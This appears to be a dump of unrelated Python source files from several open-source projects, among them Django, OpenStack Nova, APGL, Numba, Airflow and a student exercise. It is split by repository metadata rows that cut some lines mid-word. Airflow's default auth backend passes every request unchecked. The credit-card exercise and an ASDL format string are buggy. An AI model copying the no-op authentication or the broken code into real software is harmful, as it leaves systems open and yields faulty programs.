self.tripname = configParser.get("AggregateMicroPath", "trip_name")
self.resolutionLat = float(configParser.get("AggregateMicroPath", "resolution_lat"))
self.resolutionLon = float(configParser.get("AggregateMicroPath", "resolution_lon"))
self.tripLatMin = int(math.floor(self.tripLat1/self.resolutionLat))#6
self.tripLatMax = int(math.ceil(self.tripLat2/self.resolutionLat)) #7
self.tripLonMin = int(math.floor(self.tripLon1/self.resolutionLon)) #8
self.tripLonMax = int(math.ceil(self.tripLon2/self.resolutionLon)) #9
self.triplineBlankets.append([self.tripLat1,self.tripLon1,self.tripLat2,self.tripLon2,self.tripname,self.resolutionLat,self.resolutionLon,self.tripLatMin,self.tripLatMax,self.tripLonMin,self.tripLonMax])
self.temporal_split = configParser.get("AggregateMicroPath", "temporal_split")
|
xualex/DjangoTutorial
|
alex/alex/wsgi.py
|
Python
|
mit
| 386 | 0 |
"""
WSGI config for alex project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproj
|
ect.co
|
m/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "alex.settings")
application = get_wsgi_application()
|
CCI-Tools/cate-core
|
cate/conf/template.py
|
Python
|
mit
| 5,327 | 0.007509 |
################################################################################
# This is a Cate configuration file. #
# #
# If this file is "~/.cate/conf.py", it is the active Cate configuration. #
#
|
#
# If this file is named "conf.py.template" you can rename it and move #
# it "~/.cate/conf.py" to make it the active Cate configuration file. #
# #
# As this is a regular Python script, you may
|
use any Python code to compute #
# the settings provided here. #
# #
# Please find the configuration template for a given Cate VERSION at #
# https://github.com/CCI-Tools/cate/blob/vVERSION/cate/conf/template.py #
# For example: #
# https://github.com/CCI-Tools/cate/blob/v2.0.0.dev4/cate/conf/template.py #
################################################################################
# 'data_stores_path' is denotes a directory where Cate stores information about data stores and also saves
# local data files synchronized with their remote versions.
# Use the tilde '~' (also on Windows) within the path to point to your home directory.
#
# data_stores_path = '~/.cate/data_stores'
# 'dataset_persistence_format' names the data format to be used when persisting datasets in the workspace.
# Possible values are 'netcdf4' or 'zarr'.
# dataset_persistence_format = 'netcdf4'
# If 'use_workspace_imagery_cache' is True, Cate will maintain a per-workspace
# cache for imagery generated from dataset variables. Such cache can accelerate
# image display, however at the cost of disk space.
#
# use_workspace_imagery_cache = False
# Default prefix for names generated for new workspace resources originating from opening data sources
# or executing workflow steps.
# This prefix is used only if no specific prefix is defined for a given operation.
# default_res_pattern = 'res_{index}'
# User defined HTTP proxy settings, will replace one stored in System environment variable 'http_proxy'
# Accepted proxy details formats:
# 'http://user:password@host:port'
# 'https://user:password@host:port'
# 'http://host:port'
# 'https://host:port'
# http_proxy =
# Include/exclude data sources (currently effective in Cate Desktop GUI only, not used by API, CLI).
#
# If 'included_data_sources' is a list, its entries are expected to be wildcard patterns for the identifiers of data
# sources to be included. By default, or if 'included_data_sources' is None, all data sources are included.
# If 'excluded_data_sources' is a list, its entries are expected to be wildcard patterns for the identifiers of data
# sources to be excluded. By default, or if 'excluded_data_sources' is None, no data sources are excluded.
# If both 'included_data_sources' and 'excluded_data_sources' are lists, we first include data sources using
# 'included_data_sources' then remove entries that match any result from applying 'excluded_data_sources'.
#
# We put wildcards here that match all data sources that are known to work in GUI
# included_ds_ids = []
# We put wildcards here that match all data sources that are known NOT to work in GUI
excluded_ds_ids = [
# Exclude datasets that usually take too long to download or cannot be easily aggregated
# e.g.
# 'esacci.*.day.*',
# 'esacci.*.satellite-orbit-frequency.*',
# 'esacci.LC.*',
]
# Configure names of variables that will be initially selected once a new
# dataset resource is opened in the GUI.
# default_variables = {
# 'cfc', # Cloud CCI
# 'lccs_class', # Land Cover CCI
# 'analysed_sst', # Sea Surface Temperature CCI
# }
# Configure / overwrite default variable display settings as used in various plot_<type>() operations
# and in the Cate Desktop GUI.
# Each entry maps a variable name to a dictionary with the following entries:
# color_map - name of a color map taken from from https://matplotlib.org/examples/color/colormaps_reference.html
# display_min - minimum variable value that corresponds to the lower end of the color map
# display_max - maximum variable value that corresponds to the upper end of the color map
#
# variable_display_settings = {
# 'my_var': dict(color_map='viridis', display_min=0.1, display_max=0.8),
# }
# Default color map to be used for any variable not configured in 'variable_display_settings'
# 'default_color_map' must be the name of a color map taken from from
# https://matplotlib.org/examples/color/colormaps_reference.html
# default_color_map = 'jet'
default_color_map = 'inferno'
# Data Store Configurations
# Load from here the configurations of the data stores that will eventually be loaded into cate
store_configs = {
"local": {
"store_id": "directory",
"store_params": {
"base_dir": "",
}
},
"cci-store": {
"store_id": "cciodp"
},
"cds-store": {
"store_id": "cds"
}
}
|
superstack/nova
|
nova/api/openstack/users.py
|
Python
|
apache-2.0
| 3,531 | 0.000283 |
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
#
|
under the License.
from webob import exc
from nova import exception
from nova imp
|
ort flags
from nova import log as logging
from nova.api.openstack import common
from nova.api.openstack import faults
from nova.auth import manager
FLAGS = flags.FLAGS
LOG = logging.getLogger('nova.api.openstack')
def _translate_keys(user):
return dict(id=user.id,
name=user.name,
access=user.access,
secret=user.secret,
admin=user.admin)
class Controller(common.OpenstackController):
_serialization_metadata = {
'application/xml': {
"attributes": {
"user": ["id", "name", "access", "secret", "admin"]}}}
def __init__(self):
self.manager = manager.AuthManager()
def _check_admin(self, context):
"""We cannot depend on the db layer to check for admin access
for the auth manager, so we do it here"""
if not context.is_admin:
raise exception.AdminRequired()
def index(self, req):
"""Return all users in brief"""
users = self.manager.get_users()
users = common.limited(users, req)
users = [_translate_keys(user) for user in users]
return dict(users=users)
def detail(self, req):
"""Return all users in detail"""
return self.index(req)
def show(self, req, id):
"""Return data about the given user id"""
#NOTE(justinsb): The drivers are a little inconsistent in how they
# deal with "NotFound" - some throw, some return None.
try:
user = self.manager.get_user(id)
except exception.NotFound:
user = None
if user is None:
raise faults.Fault(exc.HTTPNotFound())
return dict(user=_translate_keys(user))
def delete(self, req, id):
self._check_admin(req.environ['nova.context'])
self.manager.delete_user(id)
return {}
def create(self, req):
self._check_admin(req.environ['nova.context'])
env = self._deserialize(req.body, req.get_content_type())
is_admin = env['user'].get('admin') in ('T', 'True', True)
name = env['user'].get('name')
access = env['user'].get('access')
secret = env['user'].get('secret')
user = self.manager.create_user(name, access, secret, is_admin)
return dict(user=_translate_keys(user))
def update(self, req, id):
self._check_admin(req.environ['nova.context'])
env = self._deserialize(req.body, req.get_content_type())
is_admin = env['user'].get('admin')
if is_admin is not None:
is_admin = is_admin in ('T', 'True', True)
access = env['user'].get('access')
secret = env['user'].get('secret')
self.manager.modify_user(id, access, secret, is_admin)
return dict(user=_translate_keys(self.manager.get_user(id)))
|
charanpald/APGL
|
apgl/graph/SparseGraph.py
|
Python
|
bsd-3-clause
| 19,320 | 0.008023 |
from apgl.graph.AbstractMatrixGraph import AbstractMatrixGraph
from apgl.graph.AbstractVertexList import AbstractVertexList
from apgl.graph.GeneralVertexList import GeneralVertexList
from apgl.graph.VertexList import VertexList
from apgl.util.Util import Util
from apgl.util.SparseUtils import SparseUtils
from apgl.util.Parameter import Parameter
import scipy.sparse as sparse
import scipy.io
import numpy
class SparseGraph(AbstractMatrixGraph):
'''
Represents a graph, which can be directed or undirected, and has weights
on the edges. Memory usage is efficient for sparse graphs. The list of vertices
is immutable (see VertexList), however edges can be added or removed. Only
non-zero edges can be added. Uses scipy.sparse for the underlying matrix
representation.
'''
def __init__(self, vertices, undirected=True, W=None, dtype=numpy.float, frmt="csr"):
"""
Create a SparseGraph with a given AbstractVertexList or number of
vertices, and specify whether it is directed. One can optionally pass
in a sparse matrix W which is used as the weight matrix of the
graph. Different kinds of sparse matrix can impact the speed of various
operations. The currently supported sparse matrix types are: lil_matrix,
csr_matrix, csc_matrix and dok_matrix. The default sparse matrix is
csr_matrix.
:param vertices: the initial set of vertices as a AbstractVertexList object, or an int to specify the number of vertices in which case vertices are stored in a GeneralVertexList.
:param undirected: a boolean variable to indicate if the graph is undirected.
:type undirected: :class:`boolean`
:param W: a square sparse matrix of the same size as the number of vertices, or None to create the default one.
:param dtype: the data type of the sparse matrix if W is not specified.
:param frmt: the format of the sparse matrix: lil, csr or csc if W is not specified
"""
Parameter.checkBoolean(undirected)
if isinstance(vertices, AbstractVertexList):
self.vList = vertices
elif isinstance(vertices, int):
self.vList = GeneralVertexList(vertices)
else:
raise ValueError("Invalid vList parameter: " + str(vertices))
if W != None and not (sparse.issparse(W) and W.shape == (self.vList.getNumVertices(), self.vList.getNumVertices())):
raise ValueError("Input argument W must be None or sparse matrix of size " + str(self.vList.getNumVertices()) )
self.undirected = undirected
if frmt=="lil":
matrix = sparse.lil_matrix
elif frmt=="csr":
matrix = sparse.csr_matrix
elif frmt=="csc":
matrix = sparse.csc_matrix
else:
raise ValueError("Invalid sparse matrix format: " + frmt)
#Terrible hack alert: can't create a zero size sparse matrix, so we settle
#for one of size 1. Better is to create a new class.
if self.vList.getNumVertices() == 0 and W == None:
self.W = matrix((1, 1), dtype=dtype)
elif W == None:
self.W = matrix((self.vList.getNumVertices(), self.vList.getNumVertices()), dtype=dtype)
else:
self.W = W
#The next line is for error checking mainly
self.setWeightMatrix(W)
def neighbours(self, vertexIndex):
"""
Return an array of the indices of neighbours. In the case of a directed
graph it is an array of those vertices connected by an edge from the current
one.
:param vertexIndex: the index of a vertex.
:type vertexIndex: :class:`int`
:returns: An array of the indices of all neigbours of the input vertex.
"""
Parameter.checkIndex(vertexIndex, 0, self.vList.getNumVertices())
#neighbours = self.W[vertexIndex, :].nonzero()[1]
neighbours = self.W.getrow(vertexIndex).nonzero()[1]
#neighbours = numpy.nonzero(self.W.getrow(vertexIndex).toarray())[1]
return neighbours
def neighbourOf(self, vertexIndex):
"""
Return an array of the indices of vertices than have an edge going to the input
vertex.
:param vertexIndex: the index of a vertex.
:type vertexIndex: :class:`int`
:returns: An array of the indices of all vertices with an edge towards the input vertex.
"""
Parameter.checkIndex(vertexIndex, 0, self.vList.getNumVertices())
nonZeroInds = self.W[:, vertexIndex].nonzero()
neighbours = nonZeroInds[0]
return neighbours
def getNumEdges(self):
"""
:returns: the total number of edges in this graph.
"""
if self.getNumVertices()==0:
return 0
#Note that self.W.getnnz() doesn't seem to work correctly
if self.undirected == True:
return (self.W.nonzero()[0].shape[0] + numpy.sum(SparseUtils.diag(self.W) != 0))/2
else:
return self.W.nonzero()[0].shape[0]
def getNumDirEdges(self):
"""
:returns: the number of edges, taking this graph as a directed graph.
"""
return self.W.nonzero()[0].shape[0]
def outDegreeSequence(self):
"""
:returns: a vector of the (out)degree sequence for each vertex.
"""
A = self.nativeAdjacencyMatrix()
degrees = numpy.array(A.sum(1), dtype=numpy.int32).ravel()
return degrees
def inDegreeSequence(self):
"""
:returns: a vector of the (in)degree sequence for each vertex.
"""
A = self.nativeAdjacencyMatrix()
degrees = numpy.array(A.sum(0), dtype=numpy.int32).ravel()
return degrees
def subgraph(self, vertexIndices):
"""
Pass in a list or set of vertexIndices and returns the subgraph containi
|
ng
those vertices only, and edges between them. The subgraph indices correspond
to the sorted input indices.
:param vertexIndices: the indices of the subgraph vertices.
:type vertexIndices: :class:`list`
:returns: A new SparseGraph containing only vertices and edges from vertexIndice
|
s
"""
Parameter.checkList(vertexIndices, Parameter.checkIndex, (0, self.getNumVertices()))
vertexIndices = numpy.unique(numpy.array(vertexIndices)).tolist()
vList = self.vList.subList(vertexIndices)
subGraph = SparseGraph(vList, self.undirected)
if len(vertexIndices) != 0:
subGraph.W = self.W[vertexIndices, :][:, vertexIndices]
return subGraph
def getWeightMatrix(self):
"""
Return the weight matrix in dense format. Warning: should not be used
unless sufficient memory is available to store the dense matrix.
:returns: A numpy.ndarray weight matrix.
"""
if self.getVertexList().getNumVertices() != 0:
return self.W.toarray()
else:
return numpy.zeros((0, 0))
def getSparseWeightMatrix(self):
"""
Returns the original sparse weight matrix.
:returns: A scipy.sparse weight matrix.
"""
return self.W
def add(self, graph):
"""
Add the edge weights of the input graph to the current one. Results in a
union of the edges.
:param graph: the input graph.
:type graph: :class:`apgl.graph.SparseGraph`
:returns: A new graph with same vertex list and addition of edge weights
"""
Parameter.checkClass(graph, SparseGraph)
if graph.getNumVertices() != self.getNumVertices():
raise ValueError("Can only add edges from graph with same number of vertices")
if self.undirected != graph.undirected:
|
shiquanwang/numba
|
numba/asdl/common/asdl.py
|
Python
|
bsd-2-clause
| 13,170 | 0.001974 |
# -*- coding: utf-8 -*-
"""An implementation of the Zephyr Abstract Syntax Definition Language.
See http://asdl.sourceforge.net/ and
http://www.cs.princeton.edu/research/techreps/TR-554-97
Only supports top level module decl, not view. I'm guessing that view
is intended to support the browser and I'm not interested in the
browser.
Changes for Python: Add support for module versions
"""
from __future__ import print_function, division, absolute_import
import os
import traceback
from . import spark
class Token(object):
# spark seems to dispatch in the parser based on a token's
# type attribute
def __init__(self, type, lineno):
self.type = type
self.lineno = lineno
def __str__(self):
return self.type
def __repr__(self):
return str(self)
class Id(Token):
def __init__(self, value, lineno):
self.type = 'Id'
self.value = value
self.lineno = lineno
def __str__(self):
return self.value
class String(Token):
def __init__(self, value, lineno):
self.type = 'String'
self.value = value
self.lineno = lineno
class ASDLSyntaxError(Exception):
def __init__(self, lineno, token=None, msg=None):
self.lineno = lineno
self.token = token
self.msg = msg
def __str__(self):
if self.msg is None:
return "Error at '%s', line %d" % (self.token, self.lineno)
else:
return "%s, line %d" % (self.msg, self.lineno)
class ASDLScanner(spark.GenericScanner, object):
def tokenize(self, input):
self.rv = []
self.lineno = 1
super(ASDLScanner, self).tokenize(input)
return self.rv
def t_id(self, s):
r"[\w\.]+"
# XXX doesn't distinguish upper vs. lower, which is
# significant for ASDL.
self.rv.append(Id(s, self.lineno))
def t_string(self, s):
r'"[^"]*"'
self.rv.append(String(s, self.lineno))
def t_xxx(self, s): # not sure what this production means
r"<="
self.rv.append(Token(s, self.lineno))
def t_punctuation(self, s):
r"[\{\}\*\=\|\(\)\,\?\:]"
self.rv.append(Token(s, self.lineno))
def t_comment(self, s):
r"\-\-[^\n]*"
pass
def t_newline(self, s):
r"\n"
self.lineno += 1
def t_whitespace(self, s):
r"[ \t]+"
pass
def t_default(self, s):
r" . +"
raise ValueError("unmatched input: %r" % s)
class ASDLParser(spark.GenericParser, object):
def __init__(self):
super(ASDLParser, self).__init__("module")
def typestring(self, tok):
return tok.type
def error(self, tok):
raise ASDLSyntaxError(tok.lineno, tok)
def p_module_0(self, xxx_todo_changeme):
" module ::= Id Id version { } "
(module, name, version, _0, _1) = xxx_todo_changeme
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
return Module(name, None, version)
def p_module(self, xxx_todo_changeme1):
" module ::= Id Id version { definitions } "
(module, name, version, _0, definitions, _1) = xxx_todo_changeme1
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
return Module(name, definitions, version)
def p_module_1(self, xxx_todo_changeme1):
" module ::= Id Id { } "
(module, name, _0, definitions, _1) = xxx_todo_changeme1
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
return Module(name, None, None)
def p_module_2(self, xxx_todo_changeme1):
" module ::= Id Id { definitions } "
(module, name, _0, definitions, _1) = xxx_todo_changeme1
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
return Module(name
|
, definitions, None)
def p_version(self, xxx_todo_changeme2):
"version ::= Id String"
(ve
|
rsion, V) = xxx_todo_changeme2
if version.value != "version":
raise ASDLSyntaxError(version.lineno,
msg="expected 'version', found %" % version)
return V
def p_definition_0(self, xxx_todo_changeme3):
" definitions ::= definition "
(definition,) = xxx_todo_changeme3
return definition
def p_definition_1(self, xxx_todo_changeme4):
" definitions ::= definition definitions "
(definitions, definition) = xxx_todo_changeme4
return definitions + definition
def p_definition(self, xxx_todo_changeme5):
" definition ::= Id = type "
(id, _, type) = xxx_todo_changeme5
return [Type(id, type)]
def p_type_0(self, xxx_todo_changeme6):
" type ::= product "
(product,) = xxx_todo_changeme6
return product
def p_type_1(self, xxx_todo_changeme7):
" type ::= sum "
(sum,) = xxx_todo_changeme7
return Sum(sum)
def p_type_2(self, xxx_todo_changeme8):
" type ::= sum Id ( fields ) "
(sum, id, _0, attributes, _1) = xxx_todo_changeme8
if id.value != "attributes":
raise ASDLSyntaxError(id.lineno,
msg="expected attributes, found %s" % id)
if attributes:
attributes.reverse()
return Sum(sum, attributes)
def p_product(self, xxx_todo_changeme9):
" product ::= ( fields ) "
(_0, fields, _1) = xxx_todo_changeme9
fields.reverse()
return Product(fields)
def p_sum_0(self, xxx_todo_changeme10):
" sum ::= constructor "
(constructor,) = xxx_todo_changeme10
return [constructor]
def p_sum_1(self, xxx_todo_changeme11):
" sum ::= constructor | sum "
(constructor, _, sum) = xxx_todo_changeme11
return [constructor] + sum
def p_sum_2(self, xxx_todo_changeme12):
" sum ::= constructor | sum "
(constructor, _, sum) = xxx_todo_changeme12
return [constructor] + sum
def p_constructor_0(self, xxx_todo_changeme13):
" constructor ::= Id "
(id,) = xxx_todo_changeme13
return Constructor(id)
def p_constructor_1(self, xxx_todo_changeme14):
" constructor ::= Id ( fields ) "
(id, _0, fields, _1) = xxx_todo_changeme14
fields.reverse()
return Constructor(id, fields)
def p_fields_0(self, xxx_todo_changeme15):
" fields ::= field "
(field,) = xxx_todo_changeme15
return [field]
def p_fields_1(self, xxx_todo_changeme16):
" fields ::= field , fields "
(field, _, fields) = xxx_todo_changeme16
return fields + [field]
def p_field_0(self, xxx_todo_changeme17):
" field ::= Id "
(type,) = xxx_todo_changeme17
return Field(type)
def p_field_1(self, xxx_todo_changeme18):
" field ::= Id Id "
(type, name) = xxx_todo_changeme18
return Field(type, name)
def p_field_2(self, xxx_todo_changeme19):
" field ::= Id * Id "
(type, _, name) = xxx_todo_changeme19
return Field(type, name, seq=True)
def p_field_3(self, xxx_todo_changeme20):
" field ::= Id ? Id "
(type, _, name) = xxx_todo_changeme20
return Field(type, name, opt=True)
def p_field_4(self, xxx_todo_changeme21):
" field ::= Id * "
(type, _) = xxx_todo_changeme21
return Field(type, seq=True)
def p_field_5(self, xxx_todo_changeme22):
" field ::= Id ? "
(type, _) = xxx_todo_changeme22
return Field(type, opt=True)
builtin_types = ("identifier", "string", "int", "bool", "object", "bytes")
# below is a collection of classes to capture the AST of an AST :-)
# not sure if any of the methods are useful yet, but I'm adding them
# pieceme
|
khosrow/luma-devel
|
luma/base/gui/design/ServerDialogDesign.py
|
Python
|
gpl-2.0
| 36,277 | 0.003556 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/mnt/debris/devel/repo/git/luma-fixes/resources/forms/ServerDialogDesign.ui'
#
# Created: Wed May 25 21:41:09 2011
# by: PyQt4 UI code generator 4.8.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_ServerDialogDesign(object):
def setupUi(self, ServerDialogDesign):
ServerDialogDesign.setObjectName(_fromUtf8("ServerDialogDesign"))
ServerDialogDesign.resize(662, 430)
ServerDialogDesign.setMinimumSize(QtCore.QSize(550, 350))
self.vboxlayout = QtGui.QVBoxLayout(ServerDialogDesign)
self.vboxlayout.setObjectName(_fromUtf8("vboxlayout"))
self.splitter = QtGui.QSplitter(ServerDialogDesign)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.splitter.sizePolicy().hasHeightForWidth())
self.splitter.setSizePolicy(sizePolicy)
self.splitter.setOrientation(QtCore.Qt.Horizontal)
self.splitter.setChildrenCollapsible(False)
self.splitter.setObjectName(_fromUtf8("splitter"))
self.layout3 = QtGui.QWidget(self.splitter)
self.layout3.setObjectName(_fromUtf8("layout3"))
self.serverListGrid = QtGui.QGridLayout(self.layout3)
self.serverListGrid.setMargin(0)
self.serverListGrid.setObjectName(_fromUtf8("serverListGrid"))
self.serverListView = QtGui.QListView(self.layout3)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.serverListView.sizePolicy().hasHeightForWidth())
self.serverListView.setSizePolicy(sizePolicy)
self.serverListView.setObjectName(_fromUtf8("serverListView"))
self.serverListGrid.addWidget(self.serverListView, 0, 0, 1, 2)
self.addButton = QtGui.QPushButton(self.layout3)
self.addButton.setAutoDefault(True)
self.addButton.setDefault(False)
self.addButton.setObjectName(_fromUtf8("addButton"))
self.serverListGrid.addWidget(self.addButton, 1, 0, 1, 1)
self.deleteButton = QtGui.QPushButton(self.layout3)
self.deleteButton.setAutoDefault(True)
self.deleteButton.setObjectName(_fromUtf8("deleteButton"))
self.serverListGrid.addWidget(self.deleteButton, 1, 1, 1, 1)
self.testConnectionButton = QtGui.QPushButton(self.layout3)
self.testConnectionButton.setObjectName(_fromUtf8("testConnectionButton"))
self.serverListGrid.addWidget(self.testConnectionButton, 2, 0, 1, 2)
self.tabWidget = QtGui.QTabWidget(self.splitter)
self.tabWidget.setEnabled(True)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tabWidget.sizePolicy().hasHeightForWidth())
self.tabWidget.setSizePolicy(sizePolicy)
self.tabWidget.setMinimumSize(QtCore.QSize(48, 48))
self.tabWidget.setObjectName(_fromUtf8("tabWidget"))
self.networkTab = QtGui.QWidget()
self.networkTab.setObjectName(_fromUtf8("networkTab"))
self.gridlayout = QtGui.QGridLayout(self.networkTab)
self.gridlayout.setObjectName(_fromUtf8("gridlayout"))
self.networkIcon = QtGui.QLabel(self.networkTab)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
si
|
zePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.networkIcon.sizePolicy().hasHeightForWidth())
self.networkIcon.setSizePolicy(sizePolicy)
self
|
.networkIcon.setMinimumSize(QtCore.QSize(48, 48))
self.networkIcon.setText(_fromUtf8(""))
self.networkIcon.setObjectName(_fromUtf8("networkIcon"))
self.gridlayout.addWidget(self.networkIcon, 0, 0, 1, 1)
self.networkOptGrid = QtGui.QGridLayout()
self.networkOptGrid.setObjectName(_fromUtf8("networkOptGrid"))
self.networkGroup = QtGui.QGroupBox(self.networkTab)
self.networkGroup.setObjectName(_fromUtf8("networkGroup"))
self.gridLayout_5 = QtGui.QGridLayout(self.networkGroup)
self.gridLayout_5.setObjectName(_fromUtf8("gridLayout_5"))
self.networkGrid = QtGui.QGridLayout()
self.networkGrid.setObjectName(_fromUtf8("networkGrid"))
self.hostLabel = QtGui.QLabel(self.networkGroup)
self.hostLabel.setObjectName(_fromUtf8("hostLabel"))
self.networkGrid.addWidget(self.hostLabel, 0, 0, 1, 1)
self.hostEdit = QtGui.QLineEdit(self.networkGroup)
self.hostEdit.setObjectName(_fromUtf8("hostEdit"))
self.networkGrid.addWidget(self.hostEdit, 0, 1, 1, 1)
self.portLabel = QtGui.QLabel(self.networkGroup)
self.portLabel.setObjectName(_fromUtf8("portLabel"))
self.networkGrid.addWidget(self.portLabel, 2, 0, 1, 1)
self.portSpinBox = QtGui.QSpinBox(self.networkGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.portSpinBox.sizePolicy().hasHeightForWidth())
self.portSpinBox.setSizePolicy(sizePolicy)
self.portSpinBox.setMaximum(99999)
self.portSpinBox.setProperty(_fromUtf8("value"), 389)
self.portSpinBox.setObjectName(_fromUtf8("portSpinBox"))
self.networkGrid.addWidget(self.portSpinBox, 2, 1, 1, 1)
self.gridLayout_5.addLayout(self.networkGrid, 0, 0, 1, 1)
self.networkOptGrid.addWidget(self.networkGroup, 0, 0, 1, 1)
self.LDAPGroup = QtGui.QGroupBox(self.networkTab)
self.LDAPGroup.setObjectName(_fromUtf8("LDAPGroup"))
self.gridLayout_7 = QtGui.QGridLayout(self.LDAPGroup)
self.gridLayout_7.setObjectName(_fromUtf8("gridLayout_7"))
self.LDAPGrid = QtGui.QGridLayout()
self.LDAPGrid.setObjectName(_fromUtf8("LDAPGrid"))
self.aliasBox = QtGui.QCheckBox(self.LDAPGroup)
self.aliasBox.setEnabled(False)
self.aliasBox.setObjectName(_fromUtf8("aliasBox"))
self.LDAPGrid.addWidget(self.aliasBox, 0, 0, 1, 2)
self.baseDNBox = QtGui.QCheckBox(self.LDAPGroup)
self.baseDNBox.setObjectName(_fromUtf8("baseDNBox"))
self.LDAPGrid.addWidget(self.baseDNBox, 1, 0, 1, 2)
self.baseDNLabel = QtGui.QLabel(self.LDAPGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.baseDNLabel.sizePolicy().hasHeightForWidth())
self.baseDNLabel.setSizePolicy(sizePolicy)
self.baseDNLabel.setObjectName(_fromUtf8("baseDNLabel"))
self.LDAPGrid.addWidget(self.baseDNLabel, 2, 0, 1, 1)
self.baseDNEdit = QtGui.QLineEdit(self.LDAPGroup)
self.baseDNEdit.setObjectName(_fromUtf8("baseDNEdit"))
self.LDAPGrid.addWidget(self.baseDNEdit, 2, 1, 1, 1)
self.hLayout = QtGui.QHBoxLayout()
self.hLayout.setObjectName(_fromUtf8("hLayout"))
spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.hLayout.addItem(spacerItem)
self.addBaseDNButton = QtGui.QPushButton(self.LDAPGroup)
self.addBaseDNButton.setAutoDefault(False)
self.addBaseDNButton.setObjectName(_fromUtf8("addBaseDNButton"))
self.hLayout.addWidget(self.addBaseDNButton)
self.deleteBaseDNButton = QtGui.QPushButton(self.LDAPGroup)
self.deleteBaseDNButton.setAutoDefault(False)
self.deleteBaseDNButton.setObjectName(_fromUtf8("deleteBaseDNButton"))
|
scheib/chromium
|
third_party/blink/web_tests/external/wpt/cookies/resources/dropSecure.py
|
Python
|
bsd-3-clause
| 501 | 0.001996 |
from cookies.
|
resources.helpers import makeDropCookie, setNoCacheAndCORSHeaders
def main(request, response):
"""Respond to `/cookie/drop/secure` by dropping the two cookie set by
`setSecureTestCookies()`"""
headers = setNoCacheAndCORSHeaders(request, response)
# Expire the cookies, and return a JSON-encoded success code.
headers.append(makeDropCookie(b"alone_secure", False))
headers.append(makeDropCookie(b"alone_insecure", False))
return headers, b'{"succ
|
ess": true}'
|
pandastrail/InfoEng
|
scripting/exercises/p06_2.py
|
Python
|
gpl-3.0
| 1,641 | 0.007932 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 18 16:28:59 2017
@author: hase
2. Credit Card Number Check
Suppose you have been hired by MeisterCard to write a function
which checks if a given credit card number is valid.
Your function check(card_number) should take a string card_number as input.
- First, if the string does not follow the format "#### #### #### ####", where
each # is a digit, it should retur
|
n False.
- Then, if the sum of the digits is divisible by 10 (a "checksum" method),
then the procedure should return True, o
|
therwise it should return False.
For example, if card_number is the string "9384 3495 3297 0123" then although
the format is correct, the digit’s sum is 72 so you should return False.
Hints:
- You can split a string at a specific character using the function split().
parts = my_string.split('a')
- You can test if a string contains only digits with the function isdigit().
only_digits = my_string.isdigit()
"""
# Modules
import numpy as np
# Functions
def invalid():
''' Feedback to user after an invaid input'''
print('Invalid number, please try again!')
def card():
''' Get user input with card number'''
card_num = input('Card number, #### #### #### ####? ')
if len(card_num) == 19:
sanitized = card_num.split(' ')
s = len(sanitized)
if s == 4:
i = range(s)
for i in sanitized:
if sanitized[i].isdigit():
print('Valid number!')
else: invalid()
else: invalid()
else: invalid()
return card_num
card()
|
danielvdende/incubator-airflow
|
airflow/api/auth/backend/default.py
|
Python
|
apache-2.0
| 1,051 | 0 |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Li
|
cense for the
# specific language governing permissions and limitations
# under the License.
from functools import wraps
client_auth = None
def init_app(app):
pass
def requires_authentication(function):
@wraps(function)
def decorated(*args, **kwargs):
return function(*args, **kwargs)
return d
|
ecorated
|
teirce/game-valet
|
app/startup/common_settings.py
|
Python
|
bsd-2-clause
| 957 | 0.00209 |
import os
